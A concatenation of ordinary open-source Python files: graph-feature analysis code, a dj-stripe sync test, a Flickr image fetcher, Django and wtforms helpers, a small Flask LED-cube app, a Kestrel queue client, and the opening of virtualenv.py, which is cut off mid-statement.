__email__ = "E-Mail: roland.kwitt@kitware.com"
__status__ = "Development"
# Graph handling
import networkx as nx
from networkx.algorithms import bipartite
# Machine learning
import sklearn.mixture.gmm as gm
from sklearn.cluster import KMeans
from collections import defaultdict
# Misc.
import logging
import numpy as np
import scipy.sparse
import time
import sys
import os
attr_list = [# Average degree
lambda g : np.mean([e for e in g.degree().values()]),
# Average eccentricity
#lambda g : np.mean([i for i in nx.eccentricity(g).values()]),
# Average closeness centrality
#lambda g : np.mean([e for e in nx.closeness_centrality(g).values()]),
# Percentage of isolated points (i.e., degree(v) = 1)
lambda g : float(len(np.where(np.array(nx.degree(g).values())==1)[0]))/g.order(),
# Spectral radius (i.e., largest AM eigenvalue)
#lambda g : np.abs(nx.adjacency_spectrum(g))[0],
# Spectral trace (i.e., sum of abs. eigenvalues)
# lambda g : np.sum(np.abs(nx.adjacency_spectrum(g))),
# Label entropy, as defined in [2]
lambda g : label_entropy([e[1]['type'] for e in g.nodes(data=True)]),
# Mixing coefficient of attributes
lambda g : np.linalg.det(nx.attribute_mixing_matrix(g,'type')),
# Avg. #vertics with eccentricity == radius (i.e., central points)
# lambda g : np.mean(float(len(nx.center(g)))/g.order()),
# Link impurity, as defined in [2]
lambda g : link_impurity(g)]
# Diameter := max(eccentricity)
# lambda g : nx.diameter(g),
# Radius := min(eccentricity)
#lambda g : nx.radius(g)]
def link_impurity(g):
"""Compute link impurity of vertex-labeled graph.
Parameters
----------
g : networkx Graph
Input graph with vertex attribute stored as 'type'.
Returns
-------
impurity : float
Link impurity, see [2]
"""
if len(g.nodes()) == 1:
return 0
edges = g.edges()
u = np.array([g.node[a]['type'] for (a,b) in edges])
v = np.array([g.node[b]['type'] for (a,b) in edges])
return float(len(np.nonzero(u - v)[0]))/len(edges)
def label_entropy(labels):
"""Compute entropy of label vector.
Parameters
----------
labels : numpy array, shape (L,)
The input labels.
Returns
-------
entropy : float
Entropy of the label vector, see [2]
"""
H = np.bincount(labels)
p = H[np.nonzero(H)].astype(float)/np.sum(H)
return np.abs(-np.sum(p * np.log(p)))
def graph_from_file(graph_file, label_file=None, n_skip=0):
"""Load graph from an ASCII file containing adjacency information.
Parameters
----------
graph_file : string
Filename of the file containing all the adjaceny information. Format of
the adjaceny matrix file is as follows:
[Header, optional]
0 1 1
1 0 0
0 1 0
Interpretation: 3x3 adjaceny matrix, e.g., with an edge between vertices
(0,1) and (0,2), etc.
label_file : string
Filename of the label information file. Here is an example:
[Header, optional]
5
2
1
Interpretation: 3 labels, v_0 label: 5, v_1 label: 2 and v_2 label: 1.
n_skip : int (default: 0)
Skip n header lines.
Returns
-------
G : networkx Graph
"""
logger = logging.getLogger()
if not os.path.exists(graph_file):
raise Exception("Graph file %s not found!" % graph_file)
# Load adjacency information and ensure (0,1) weights
adj_info = np.genfromtxt(graph_file, skip_header=n_skip)
adj_info[np.where(adj_info >= 1)] = 1
G = nx.Graph(adj_info)
if not label_file is None:
if not os.path.exists(label_file):
raise Exception("Label file %d not found!" % label_file)
labels = np.genfromtxt(label_file, skip_header=n_skip)
logger.debug("Loaded labelfile %s!" % label_file)
if len(labels) != len(G):
raise Exception("Size mismatch for labels!")
for idx,l in enumerate(labels):
G.node[idx]['type'] = int(l)
logger.debug("Built graph from %s with %d vertices." %
(graph_file, len(G)))
return G
def compute_graph_features(g, radius=2, sps=None, omit_degenerate=False, run_global=False):
"""Compute graph feature vector(s).
Parameters
----------
g : networkx input graph with N vertices
The input graph on which we need to compute graph features.
radius: int (default: 2)
Compute graph features from local neighborhoods of vertices,
where the notion of neighborhood is defined by the number of
hops to the neighbor, i.e., the radius. This assumes that the
initial edges weights when computing the shortest-paths are 1.
sps: numpy matrix, shape (N, N) (default : None)
Matrix of shortest-path information for the graph g.
omit_degenerate : boolean (default: False)
Currently, degenerate cases are subgraphs with just a single
vertex. If 'omit_degenerate' is 'True', these subgraphs are
not considered. Otherwise, the feature vector for such a sub-
graph is just a vector of zeros.
run_global: boolean (default : False)
Compute a GLOBAL graph descriptor using the define features.
Returns
-------
v_mat : numpy matrix, shape (N, D)
A D-dimensional feature matrix with one feature vector for
each vertex. Features are computed for the given radius. In
case global is True, N=1.
"""
logger = logging.getLogger()
# global feature computation
if run_global:
v = [attr_fun(g) for attr_fun in attr_list]
v_mat = np.zeros((1,len(attr_list)))
v_mat[0,:] = np.asarray(v)
return v_mat
# Recompute shortest paths if neccessary
if sps is None:
sps = nx.floyd_warshall_numpy(g)
# Feature matrix representation of graph
v_mat = np.zeros([len(g),len(attr_list)])
# Iterate over all nodes
degenerates = []
for n in g.nodes():
# Get n-th row of shortest path matrix
nth_row = np.array(sps[n,:]).ravel()
# Find elements within a certain radius
within_radius = np.where(nth_row <= radius)
# Build a subgraph from those nodes
sg = g.subgraph(within_radius[0])
# Single vertex sg is considered degenerate
if len(sg.nodes()) == 1:
# Keep track of degenerates
degenerates.append(n)
if omit_degenerate:
continue
# Feature vector is 0-vector
v = np.zeros((len(attr_list),))
else:
v = [attr_fun(sg) for attr_fun in attr_list]
v_mat[n,:] = np.asarray(v)
logger.info("Found %d degenerate cases!" % len(degenerates))
if len(degenerates):
logger.info("Pruning %d degenerate cases ..." % len(degenerates))
v_mat = np.delete(v_mat, degenerates, axis=0)
logger.debug("Computed (%d x %d) feature matrix." %
(v_mat.shape[0], v_mat.shape[1]))
return v_mat
def run_fsa(data, radii=None, recompute=True, out=None, skip=0,
omit_degenerate=False, run_global=False):
"""Run (f)ine-(s)tructure (a)nalysis.
Paramters
---------
data : list of N 3-tuple of (graph files,label files, class
indices). We iterate over this list and compute fine-structure
topological features for each graph.
radii : list of 'int'
The desired neighborhood radii.
recompute: bool (default : True)
Recompote features, otherwise try to load them from disk.
In case we try to load from disk, filenames are constructed
based on the value of the 'out' parameter.
out : string (default : None)
Base file name for the generated data files, e.g.,
'/tmp/data'. Two files will be written to disk:
/tmp/data.mat
/tmp/data.idx
where 'data.mat' contains the feature matrix, i.e., one
feature vector per vertex; 'data.idx' contains the indices
that identify which graph each feature vector belongs to;
skip : int (default : 0)
Skip N header entries when loading graphs.
omit_degenerate : boolean (default: False)
Currently, degenerate cases are subgraphs with just a single
vertex. If 'omit_degenerate' is 'True', these subgraphs are
not considered. Otherwise, the feature vector for such a sub-
graph is just a vector of zeros.
run_global : booelan (default : False)
Compute a GLOBAL graph descriptor using the define features.
Returns
-------
X : numpy matrix, shape (#vertices, len(radii)*D)
Feature matrix, where D is the total number of
features that are computed for one radius setting.
L : numpy array, shape (#total vertices,)
Identifies to which graph a feature vector belongs
to.
"""
logger = logging.getLogger()
if radii is None:
raise Exception("No radii given!")
if not out is None:
mat_file = "%s.mat" % out
idx_file = "%s.idx" % out
if not recompute:
if (os.path.exists(mat_file) and
os.path.exists(idx_file)):
logger.info("Loading data from file(s).")
data_mat = np.genfromtxt(mat_file)
data_idx = np.genfromtxt(idx_file)
return {'data_mat' : data_mat,
'data_idx' : data_idx}
data_mat = []
data_idx = []
for idx, (cf, lf, lab) in enumerate(data):
logger.info("Processing %d-th graph ..." % idx)
T, x = graph_from_file(cf, lf, skip), []
if run_global:
# if run_global is True, all other parameters do NOT matter!
x.append(compute_graph_features(T, 0, None, None, run_global))
else:
for r in radii:
x.append(compute_graph_features(T, r, None, omit_degenerate))
xs = np.hstack(tuple(x))
data_mat.append(xs)
data_idx.append(np.ones((xs.shape[0], 1))*idx)
data_mat = np.vstack(tuple(data_mat))
data_idx = np.vstack(tuple(data_idx))
if not out is None:
np.savetxt(mat_file, data_mat, delimiter=' ')
np.savetxt(idx_file, data_idx, delimiter=' ',fmt="%d")
return {'data_mat' : data_mat,
'data_idx' : data_idx}
def estimate_gm(X,components=3,seed=None):
"""Estimate a Gaussian mixture model.
Note: Uses diagonal covariance matrices.
Parameters
----------
X : numpy matrix, shape (N,D)
Matrix of data samples (i-th row is i-th sample vector).
c : int (default : 3)
Number of desired mixture components.
seed : int (default : None)
Seed for the random number generator.
Returns
-------
gm_obj : sklearn.mixture.gmm object
Estimated GMM.
"""
logger = logging.getLogger()
n, d = X.shape
logger.info("Estimating %d-comp. GMM from (%d x %d) ..." %
(components, n, d))
gm_obj = gm.GMM (n_components=components,
covariance_type='diag',
random_state=seed)
gm_obj.fit(X)
return gm_obj
def learn_codebook(X, codebook_size=200, seed=None):
"""Learn a codebook.
Run K-Means clustering to compute a codebook. K-Means
is initialized by K-Means++, uses a max. of 500 iter-
ations and 10 times re-initialization.
Paramters
---------
X : numpy matrix, shape (N,D)
Input data.
codebook_size : int (default : 200)
Desired number of codewords.
seed : int (default : None)
Seed for random number generator.
Returns
-------
cb : sklearn.cluster.KMeans object
KMeans object after fitting.
"""
logger = logging.getLogger()
logger.info("Learning codebook with %d words ..." % codebook_size)
# Run vector-quantization
cb = KMeans(codebook_size,
init="k-means++",
n_init=10,
max_iter=500,
random_state=seed)
cb.fit(X)
return cb
def bow(X, cb):
"""Compute a (normalized) BoW histogram.
Parameters
----------
X : numpy matrix, shape (N, D)
Input data.
cb : sklearn.cluster.KMeans
Already estimated codebook with C codewords.
Returns
-------
H : numpy array, shape (C,)
Normalized (l2-norm) BoW histogram.
"""
# Get nr. codewords
n,d = cb.cluster_centers_.shape
if d != X.shape[1]:
raise Exception("Dimensionality mismatch!")
# Compute closest cluster centers
assignments = cb.predict(X)
# Compute (normalized) BoW histogram
B = range(0,n+1)
return np.histogram(assignments,bins=B,density=True)[0]
def pp_gmm(X, models, argmax=True):
"""Compute the posterior probability of X under a set of GMM models.
Parameters
----------
X : numpy matrix, shape (N,D)
Data samples.
models : list of sklearn.mixture.gmm objects
List of C estimated GMMs.
argmax : boolean (default : True)
If 'True', the index of the class (represented by
it's model) with the highest a-posteriori probability
is computed. If 'False', the a-posteriori probability
if each class (represented by the model) is computed for
each row in X. Note: We assume equal prior probabilities
for each class.
Returns
-------
maxp : numpy.int64, or np.array with shape (N, C)
Depending on whether 'argmax' is 'True' or
'False', the index of the class with the highest
a-posteriori probability is returned, or the
a-posteriori probabilities under each model (for
each feature vector in X).
"""
n,d = X.shape
n_models = len(models)
ll = np.zeros((n,n_models),dtype="float32")
for i, model in enumerate(models):
ll[:,i] = np.asarray(model.score(X)).ravel()
if argmax:
# Column-wise sum
sump = np.sum(ll,axis=0)
# LogSumExp to compute MAP
t0 = np.max(sump)
t1 = np.exp(sump - (np.log(np.sum(np.exp(sump - t0))) + t0))
max_idx = np.argmax(t1)
return max_idx
else:
# LogSumExp to compute row-wise MAP
t0 = np.asmatrix(np.max(ll,axis=1)).transpose()
t1 = np.log(np.sum(np.exp(ll - np.tile(t0,(1,n_models))),axis=1)) + t0
prob = np.exp(np.asmatrix(ll) - t1)
return prob
| rkwitt/pyfsa | core/fsa.py | Python | apache-2.0 | 15,682 |
"""
.. module:: dj-stripe.tests.test_integrations.test_sync
:synopsis: dj-stripe Sync Method Tests.
.. moduleauthor:: Alex Kavanaugh (@kavdev)
"""
import sys
from django.conf import settings
from django.test.testcases import TestCase
from django.contrib.auth import get_user_model
from djstripe.models import Charge
from djstripe.sync import sync_subscriber
from unittest.case import skip
# These tests will be converted to sync tests on the customer model
if False:
@skip
class TestSyncSubscriber(TestCase):
def setUp(self):
self.user = get_user_model().objects.create_user(username="testsync", email="testsync@test.com")
def test_new_customer(self):
customer = sync_subscriber(self.user)
charges = Charge.objects.filter(customer=customer)
# There shouldn't be any items attached to the customer
self.assertEqual(0, len(charges), "Charges are unexpectedly associated with a new customer object.")
def test_existing_customer(self):
customerA = sync_subscriber(self.user)
customerB = sync_subscriber(self.user)
self.assertEqual(customerA, customerB, "Customers returned are not equal.")
def test_bad_sync(self):
customer = sync_subscriber(self.user)
customer.stripe_id = "fake_customer_id"
customer.save()
sync_subscriber(self.user)
self.assertEqual("ERROR: No such customer: fake_customer_id", sys.stdout.getvalue().strip())
def test_charge_sync(self):
# Initialize stripe
import stripe
stripe.api_key = settings.STRIPE_SECRET_KEY
customer = sync_subscriber(self.user)
charges = Charge.objects.filter(customer=customer)
# There shouldn't be any items attached to the customer
self.assertEqual(0, len(charges), "Charges are unexpectedly associated with a new customer object.")
token = stripe.Token.create(
card={
"number": '4242424242424242',
"exp_month": 12,
"exp_year": 2016,
"cvc": '123'
},
)
customer.update_card(token.id)
stripe.Charge.create(
amount=int(10 * 100), # Convert dollars into cents
currency="USD",
customer=customer.stripe_id,
description="Test Charge in test_charge_sync",
)
customer = sync_subscriber(self.user)
charges = Charge.objects.filter(customer=customer)
self.assertEqual(1, len(charges), "Unexpected number of charges associated with a new customer object.")
| mthornhill/dj-stripe | tests/test_integrations/test_sync.py | Python | bsd-3-clause | 2,774 |
# -*- coding: utf-8 -*-
# This file is part of PyBOSSA.
#
# PyBOSSA is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# PyBOSSA is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with PyBOSSA. If not, see <http://www.gnu.org/licenses/>.
import urllib
import urllib2
import re
import json
import string
def get_flickr_photos(size="big"):
"""
Gets public photos from Flickr feeds
:arg string size: Size of the image from Flickr feed.
:returns: A list of photos.
:rtype: list
"""
# Get the ID of the photos and load it in the output var
# add the 'ids': '25053835@N03' to the values dict if you want to
# specify a Flickr Person ID
print('Contacting Flickr for photos')
url = "http://api.flickr.com/services/feeds/photos_public.gne"
values = {'nojsoncallback': 1,
'format': "json"}
query = url + "?" + urllib.urlencode(values)
urlobj = urllib2.urlopen(query)
data = urlobj.read()
urlobj.close()
# The returned JSON object by Flickr is not correctly escaped,
# so we have to fix it see
# http://goo.gl/A9VNo
regex = re.compile(r'\\(?![/u"])')
fixed = regex.sub(r"\\\\", data)
output = json.loads(fixed)
print('Data retrieved from Flickr')
# For each photo ID create its direct URL according to its size:
# big, medium, small (or thumbnail) + Flickr page hosting the photo
photos = []
for idx, photo in enumerate(output['items']):
print 'Retrieved photo: %s' % idx
imgUrl_m = photo["media"]["m"]
imgUrl_b = string.replace(photo["media"]["m"], "_m.jpg", "_b.jpg")
photos.append({'link': photo["link"], 'url_m': imgUrl_m,
'url_b': imgUrl_b})
return photos
if __name__ == '__main__':
file = open('flickr_tasks.json', 'w')
photos = get_flickr_photos()
file.write(json.dumps(photos))
file.close()
| NaturalHistoryMuseum/pybossa-beetles | get_images.py | Python | agpl-3.0 | 2,353 |
#!/usr/bin/env python
# vim:fileencoding=utf-8
from __future__ import (unicode_literals, division, absolute_import,
print_function)
__license__ = 'GPL v3'
__copyright__ = '2014, Kovid Goyal <kovid at kovidgoyal.net>'
class NullSmarts(object):
def __init__(self, editor):
pass
def get_extra_selections(self, editor):
return ()
def get_smart_selection(self, editor, update=True):
return editor.selected_text
def verify_for_spellcheck(self, cursor, highlighter):
return False
def cursor_position_with_sourceline(self, cursor, for_position_sync=True):
return None, None
def goto_sourceline(self, editor, sourceline, tags, attribute=None):
return False
def get_inner_HTML(self, editor):
return None
| sharad/calibre | src/calibre/gui2/tweak_book/editor/smart/__init__.py | Python | gpl-3.0 | 811 |
import sys
if sys.version_info[0] >= 3:
text_type = str
string_types = str,
iteritems = lambda o: o.items()
itervalues = lambda o: o.values()
izip = zip
else:
text_type = unicode
string_types = basestring,
iteritems = lambda o: o.iteritems()
itervalues = lambda o: o.itervalues()
from itertools import izip
def with_metaclass(meta, base=object):
return meta("NewBase", (base,), {})
| xsleonard/wtforms | wtforms/compat.py | Python | bsd-3-clause | 430 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import uuid
from django.db import models
class TimestampedModelMixin(models.Model):
""" TimestampedModelMixin
An abstract base class model that provides self-managed "created" and
"updated" fields.
"""
created = models.DateTimeField(auto_now_add=True, editable=False, db_index=True)
updated = models.DateTimeField(auto_now=True, editable=False, db_index=True)
class Meta:
abstract = True
class UUIDModelMixin(models.Model):
""" UUIDModelMixin
An abstract base class model that provides a self-managed "uuid" field.
"""
uuid = models.UUIDField(default=uuid.uuid4, editable=False, db_index=True)
class Meta:
abstract = True
| hzlf/openbroadcast.ch | app/base/models/mixins.py | Python | gpl-3.0 | 755 |
#!/usr/bin/env python
"""
A Kestrel client library.
"""
from collections import defaultdict
import re
import memcache
class Client(object):
"""Kestrel queue client."""
def __init__(self, servers, queue):
"""Constructor.
:param servers: The list of servers to connect to, really should only
be one for a kestrel client;
:type servers: list
:param queue: The name of the key to work against
:type queue: string
"""
self.__memcache = KestrelMemcacheClient(servers=servers)
self.queue = queue
def add(self, data, expire=None):
"""Add a job onto the queue.
WARNING: You should only send strings through to the queue, if not
the python-memcached library will serialize these objects and since
kestrel ignores the flags supplied during a set operation, when the
object is retrieved from the queue it will not be unserialized.
:param data: The job itself
:type data: mixed
:param expire: The expiration time of the job, if a job doesn't get
used in this amount of time, it will silently die away.
:type expire: int
:return: True/False
:rtype: bool
"""
if expire is None:
expire = 0
ret = self.__memcache.set(self.queue, data, expire)
if ret == 0:
return False
return True
def get(self, timeout=None):
"""Get a job off the queue. (unreliable)
:param timeout: The time to wait for a job if none are on the queue
when the initial request is made. (seconds)
:type timeout: int
:return: The job
:rtype: mixed
"""
cmd = '%s' % (self.queue)
if timeout is not None:
cmd = '%s/t=%d' % (cmd, timeout)
return self.__memcache.get('%s' % (cmd))
def next(self, timeout=None):
"""Marks the last job as compelete and gets the next one.
:param timeout: The time to wait for a job if none are on the queue
when the initial request is made. (seconds)
:type timeout: int
:return: The job
:rtype: mixed
"""
cmd = '%s/close' % (self.queue)
if timeout is not None:
cmd = '%s/t=%d' % (cmd, timeout)
return self.__memcache.get('%s/open' % (cmd))
def peek(self, timeout=None):
"""Copy a job from the queue, leaving the original in place.
:param timeout: The time to wait for a job if none are on the queue
when the initial request is made. (seconds)
:type timeout: int
:return: The job
:rtype: mixed
"""
cmd = '%s/peek' % (self.queue)
if timeout is not None:
cmd = '%s/t=%d' % (cmd, timeout)
return self.__memcache.get(cmd)
def abort(self):
"""Mark a job as incomplete, making it available to another client.
:return: True on success
:rtype: boolean
"""
self.__memcache.get('%s/abort' % (self.queue))
return True
def finish(self):
"""Mark the last job read off the queue as complete on the server.
:return: True on success
:rtype: bool
"""
self.__memcache.get('%s/close' % (self.queue))
return True
def delete(self):
"""Delete this queue from the kestrel server.
:return: True on success, False on error
:rtype: bool
"""
ret = self.__memcache.delete(self.queue)
if ret == 0:
return False
return True
def close(self):
"""Force the client to disconnect from the server.
:return: True
:rtype: bool
"""
self.__memcache.disconnect_all()
return True
def flush(self):
"""Clear out (remove all jobs) in the current queue.
:return: True
:rtype: bool
"""
self.__memcache.flush(self.queue)
return True
def flush_all(self):
"""Clears out all jobs in all the queues on this kestrel server.
:return: True
:rtype: bool
"""
self.__memcache.flush_all()
return True
def reload(self):
"""Forces the kestrel server to reload the config.
:return: True
:rtype: bool
"""
self.__memcache.reload()
return True
def stats(self):
"""Get the stats from the server and parse the results into a python
dict.
{
'127.0.0.1:22133': {
'stats': {
'cmd_get': 10,
...
},
'queues': {
'queue_name': {
'age': 30,
...
}
}
}
}
"""
server = None
_sstats = {}
_qstats = {}
for server, stats in self.raw_stats():
server = server.split(' ', 1)[0]
for name, stat in stats.iteritems():
if not name.startswith('queue_'):
try:
_sstats[name] = long(stat)
except ValueError:
_sstats[name] = stat
for name, stats in re.findall('queue \'(?P<name>.*?)\' \{(?P<stats>.*?)\}', self.raw_stats(True), re.DOTALL):
_stats = {}
for stat in [stat.strip() for stat in stats.split('\n')]:
if stat.count('='):
(key, value) = stat.split('=')
_stats[key] = long(value)
_qstats[name] = _stats
if server is None:
return None
return (server, dict([('server', _sstats), ('queues', _qstats)]))
def raw_stats(self, pretty=None):
"""Get statistics in either the pretty (kestrel) format or the
standard memcache format.
:param pretty: Set to True to generate the stats in the kestrel/pretty
format.
:type pretty: bool
:return: The stats text blob, or the structed format from the
underlying memcache library
:rtype: string
"""
if pretty is True:
return self.__memcache.pretty_stats()
return self.__memcache.get_stats()
def shutdown(self):
"""Shutdown the kestrel server gracefully.
:return: None
:rtype: None
"""
return self.__memcache.shutdown()
def version(self):
"""Get the version for the kestrel server.
:return: The kestrel server version. e.g. 1.2.3
:rtype: string
"""
return self.__memcache.version()
class KestrelMemcacheClient(memcache.Client):
"""Kestrel Memcache Client.
Since kestrel has a few commands that are not part of the memcached
protocol we add functions to support them.
Specifically: RELOAD, FLUSH, DUMP_STATS, DUMP_CONFIG, SHUTDOWN
Also the memcache.Client doesn't have support for the VERSION command
so we have added that function as well.
"""
def reload(self):
for s in self.servers:
if not s.connect(): continue
s.send_cmd('RELOAD')
s.expect('OK')
def flush(self, key):
for s in self.servers:
if not s.connect(): continue
s.send_cmd('FLUSH %s' % (key))
s.expect('OK')
def pretty_stats(self):
return self.__read_cmd('DUMP_STATS')
def version(self):
data = []
for s in self.servers:
if not s.connect(): continue
s.send_cmd('VERSION')
data.append(s.readline())
return ('\n').join(data).split(' ', 1)[1]
def shutdown(self):
for s in self.servers:
if not s.connect(): continue
s.send_cmd('SHUTDOWN')
def __read_cmd(self, cmd):
data = []
for s in self.servers:
if not s.connect(): continue
s.send_cmd(cmd)
data.append(self.__read_string(s))
return ('\n').join(data)
def __read_string(self, s):
data = []
while True:
line = s.readline()
if not line or line.strip() == 'END': break
data.append(line)
return ('\n').join(data)
| empower/pykestrel | kestrel/client.py | Python | bsd-3-clause | 8,431 |
"""
The application file for the package
"""
from flask import Flask, render_template, jsonify
from cube import cube
app = Flask(__name__, template_folder='server/templates')
@app.route("/")
def index():
template_data = {
'site_title' : '8x8x8 LED Cube Operations',
'page_title' : 'LED Cube Control Panel'
}
return render_template('layout.html', **template_data)
@app.route("/about")
def about():
template_data = {
'site_title' : '8x8x8 LED Cube Operations',
'page_title' : 'LED Cube v1.0'
}
return render_template('about.html', **template_data)
@app.route("/cube-status", methods=['GET'])
def cube_status():
return jsonify(cube.status())
if __name__ == "__main__":
app.run(host='0.0.0.0', port=8080, debug=True) | kamodev/8x8x8_RPi_Zero_LED_Cube | rpi_zero_ledcube/web_app.py | Python | mit | 779 |
from zirkon.program_config import ModuleConfig
CONF = ModuleConfig("""
opt0 = Int()
opt1 = Int()
opt2 = Bool(default=True)
""")
def get_opt0():
return CONF["opt0"]
def get_opt1():
return CONF["opt1"]
def get_opt2():
return CONF["opt2"]
| simone-campagna/daikon | test_zirkon/pack0/comp0/__init__.py | Python | apache-2.0 | 254 |
#!/usr/bin/env python
"""Create a "virtual" Python installation
"""
__version__ = "13.1.2"
virtualenv_version = __version__ # legacy
import base64
import sys
import os
import codecs
import optparse
import re
import shutil
import logging
import tempfile
import zlib
import errno
import glob
import distutils.sysconfig
from distutils.util import strtobool
import struct
import subprocess
import tarfile
if sys.version_info < (2, 6):
print('ERROR: %s' % sys.exc_info()[1])
print('ERROR: this script requires Python 2.6 or greater.')
sys.exit(101)
try:
basestring
except NameError:
basestring = str
try:
import ConfigParser
except ImportError:
import configparser as ConfigParser
join = os.path.join
py_version = 'python%s.%s' % (sys.version_info[0], sys.version_info[1])
is_jython = sys.platform.startswith('java')
is_pypy = hasattr(sys, 'pypy_version_info')
is_win = (sys.platform == 'win32')
is_cygwin = (sys.platform == 'cygwin')
is_darwin = (sys.platform == 'darwin')
abiflags = getattr(sys, 'abiflags', '')
user_dir = os.path.expanduser('~')
if is_win:
default_storage_dir = os.path.join(user_dir, 'virtualenv')
else:
default_storage_dir = os.path.join(user_dir, '.virtualenv')
default_config_file = os.path.join(default_storage_dir, 'virtualenv.ini')
if is_pypy:
expected_exe = 'pypy'
elif is_jython:
expected_exe = 'jython'
else:
expected_exe = 'python'
# Return a mapping of version -> Python executable
# Only provided for Windows, where the information in the registry is used
if not is_win:
def get_installed_pythons():
return {}
else:
try:
import winreg
except ImportError:
import _winreg as winreg
def get_installed_pythons():
try:
python_core = winreg.CreateKey(winreg.HKEY_LOCAL_MACHINE,
"Software\\Python\\PythonCore")
except WindowsError:
# No registered Python installations
return {}
i = 0
versions = []
while True:
try:
versions.append(winreg.EnumKey(python_core, i))
i = i + 1
except WindowsError:
break
exes = dict()
for ver in versions:
try:
path = winreg.QueryValue(python_core, "%s\\InstallPath" % ver)
except WindowsError:
continue
exes[ver] = join(path, "python.exe")
winreg.CloseKey(python_core)
# Add the major versions
# Sort the keys, then repeatedly update the major version entry
# Last executable (i.e., highest version) wins with this approach
for ver in sorted(exes):
exes[ver[0]] = exes[ver]
return exes
REQUIRED_MODULES = ['os', 'posix', 'posixpath', 'nt', 'ntpath', 'genericpath',
'fnmatch', 'locale', 'encodings', 'codecs',
'stat', 'UserDict', 'readline', 'copy_reg', 'types',
're', 'sre', 'sre_parse', 'sre_constants', 'sre_compile',
'zlib']
REQUIRED_FILES = ['lib-dynload', 'config']
majver, minver = sys.version_info[:2]
if majver == 2:
if minver >= 6:
REQUIRED_MODULES.extend(['warnings', 'linecache', '_abcoll', 'abc'])
if minver >= 7:
REQUIRED_MODULES.extend(['_weakrefset'])
elif majver == 3:
# Some extra modules are needed for Python 3, but different ones
# for different versions.
REQUIRED_MODULES.extend(['_abcoll', 'warnings', 'linecache', 'abc', 'io',
'_weakrefset', 'copyreg', 'tempfile', 'random',
'__future__', 'collections', 'keyword', 'tarfile',
'shutil', 'struct', 'copy', 'tokenize', 'token',
'functools', 'heapq', 'bisect', 'weakref',
'reprlib'])
if minver >= 2:
REQUIRED_FILES[-1] = 'config-%s' % majver
if minver >= 3:
import sysconfig
platdir = sysconfig.get_config_var('PLATDIR')
REQUIRED_FILES.append(platdir)
# The whole list of 3.3 modules is reproduced below - the current
# uncommented ones are required for 3.3 as of now, but more may be
# added as 3.3 development continues.
REQUIRED_MODULES.extend([
#"aifc",
#"antigravity",
#"argparse",
#"ast",
#"asynchat",
#"asyncore",
"base64",
#"bdb",
#"binhex",
#"bisect",
#"calendar",
#"cgi",
#"cgitb",
#"chunk",
#"cmd",
#"codeop",
#"code",
#"colorsys",
#"_compat_pickle",
#"compileall",
#"concurrent",
#"configparser",
#"contextlib",
#"cProfile",
#"crypt",
#"csv",
#"ctypes",
#"curses",
#"datetime",
#"dbm",
#"decimal",
#"difflib",
#"dis",
#"doctest",
#"dummy_threading",
"_dummy_thread",
#"email",
#"filecmp",
#"fileinput",
#"formatter",
#"fractions",
#"ftplib",
#"functools",
#"getopt",
#"getpass",
#"gettext",
#"glob",
#"gzip",
"hashlib",
#"heapq",
"hmac",
#"html",
#"http",
#"idlelib",
#"imaplib",
#"imghdr",
"imp",
"importlib",
#"inspect",
#"json",
#"lib2to3",
#"logging",
#"macpath",
#"macurl2path",
#"mailbox",
#"mailcap",
#"_markupbase",
#"mimetypes",
#"modulefinder",
#"multiprocessing",
#"netrc",
#"nntplib",
#"nturl2path",
#"numbers",
#"opcode",
#"optparse",
#"os2emxpath",
#"pdb",
#"pickle",
#"pickletools",
#"pipes",
#"pkgutil",
#"platform",
#"plat-linux2",
#"plistlib",
#"poplib",
#"pprint",
#"profile",
#"pstats",
#"pty",
#"pyclbr",
#"py_compile",
#"pydoc_data",
#"pydoc",
#"_pyio",
#"queue",
#"quopri",
#"reprlib",
"rlcompleter",
#"runpy",
#"sched",
#"shelve",
#"shlex",
#"smtpd",
#"smtplib",
#"sndhdr",
#"socket",
#"socketserver",
#"sqlite3",
#"ssl",
#"stringprep",
#"string",
#"_strptime",
#"subprocess",
#"sunau",
#"symbol",
#"symtable",
#"sysconfig",
#"tabnanny",
#"telnetlib",
#"test",
#"textwrap",
#"this",
#"_threading_local",
#"threading",
#"timeit",
#"tkinter",
#"tokenize",
#"token",
#"traceback",
#"trace",
#"tty",
#"turtledemo",
#"turtle",
#"unittest",
#"urllib",
#"uuid",
#"uu",
#"wave",
#"weakref",
#"webbrowser",
#"wsgiref",
#"xdrlib",
#"xml",
#"xmlrpc",
#"zipfile",
])
if minver >= 4:
REQUIRED_MODULES.extend([
'operator',
'_collections_abc',
'_bootlocale',
])
if is_pypy:
# these are needed to correctly display the exceptions that may happen
# during the bootstrap
REQUIRED_MODULES.extend(['traceback', 'linecache'])
class Logger(object):
"""
Logging object for use in command-line script. Allows ranges of
levels, to avoid some redundancy of displayed information.
"""
DEBUG = logging.DEBUG
INFO = logging.INFO
NOTIFY = (logging.INFO+logging.WARN)/2
WARN = WARNING = logging.WARN
ERROR = logging.ERROR
FATAL = logging.FATAL
LEVELS = [DEBUG, INFO, NOTIFY, WARN, ERROR, FATAL]
def __init__(self, consumers):
self.consumers = consumers
self.indent = 0
self.in_progress = None
self.in_progress_hanging = False
def debug(self, msg, *args, **kw):
self.log(self.DEBUG, msg, *args, **kw)
def info(self, msg, *args, **kw):
self.log(self.INFO, msg, *args, **kw)
def notify(self, msg, *args, **kw):
self.log(self.NOTIFY, msg, *args, **kw)
def warn(self, msg, *args, **kw):
self.log(self.WARN, msg, *args, **kw)
def error(self, msg, *args, **kw):
self.log(self.ERROR, msg, *args, **kw)
def fatal(self, msg, *args, **kw):
self.log(self.FATAL, msg, *args, **kw)
def log(self, level, msg, *args, **kw):
if args:
if kw:
raise TypeError(
"You may give positional or keyword arguments, not both")
args = args or kw
rendered = None
for consumer_level, consumer in self.consumers:
if self.level_matches(level, consumer_level):
if (self.in_progress_hanging
and consumer in (sys.stdout, sys.stderr)):
self.in_progress_hanging = False
sys.stdout.write('\n')
sys.stdout.flush()
if rendered is None:
if args:
rendered = msg % args
else:
rendered = msg
rendered = ' '*self.indent + rendered
if hasattr(consumer, 'write'):
consumer.write(rendered+'\n')
else:
consumer(rendered)
def start_progress(self, msg):
assert not self.in_progress, (
"Tried to start_progress(%r) while in_progress %r"
